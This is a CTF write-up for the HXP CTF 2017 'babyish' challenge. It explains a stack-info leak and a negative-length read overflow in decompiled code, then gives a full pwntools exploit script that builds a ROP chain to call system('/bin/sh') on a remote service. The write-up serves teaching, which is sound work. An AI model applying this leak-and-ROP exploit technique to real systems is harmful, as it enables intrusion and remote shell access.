HXP CTF 2017 - babyish
byNovember 24, 2017
For this challenge we get a small binary that first asks and prints a name and then reads a string.
Our first vulnerability lies in the greet
function, where the stack allocated buffer isn’t cleared before use.
void __cdecl greet(FILE *in, FILE *out)
int v2; // eax
char buf[64]; // [esp+0h] [ebp-48h]
printf("Enter username: ");
v2 = fileno(in);
read(v2, buf, 64u);
fprintf(out, "Hey %s", buf);
Thus when the name is printed back, we get access to some stack variables. In particular, we can leak a libc address and a saved esp
Having all needed addresses, all that’s left to do is overflow the second read by giving it a negative length and rop our way from there.
int __cdecl main(int argc, const char **argv, const char **envp)
int v3; // eax
char buf[64]; // [esp+0h] [ebp-5Ch]
int len; // [esp+40h] [ebp-1Ch]
int *v7; // [esp+50h] [ebp-Ch]
v7 = &argc;
setbuf(stdout, 0);
greet(stdin, stdout);
printf("Enter length: ");
len = num();
if ( len > 63 )
printf("Enter string (length %u): ", len);
v3 = fileno(stdin);
read(v3, buf, len);
puts("Thanks, bye!");
return 0;
There is still one small detail, though: at the end of main the saved value of esp is loaded back from the stack, so we actually have to add this value into our payload to make the application work. This is the relevant assembly at the end of main:
.text:080487E2 010 pop ecx ; This loads the saved esp value
.text:080487E3 00C pop ebx
.text:080487E4 008 pop esi
.text:080487E5 004 pop ebp
.text:080487E6 000 lea esp, [ecx-4] ; And here it is restored
.text:080487E9 000 retn
Finally, we can call system and get a shell:
Full exploit script:
from pwn import *
#r = process('./vuln')
r = remote('', 45067)
leak = r.recvuntil('Enter length:')
stack_leak = u32(leak[21:25])
libc_base = u32(leak[25:29]) - 0xCD18
print 'libc base: ' + hex(libc_base)
print 'stack leak: ' + hex(stack_leak)
rop = ''
rop += p32(libc_base + 0x3A840) # system
rop += p32(0x08048471) # pop; ret
rop += p32(libc_base + 0x15CD48) # "/bin/sh"
r.sendline('A' * 80 + p32(stack_leak + 0x10) + 'A' * 28 + rop)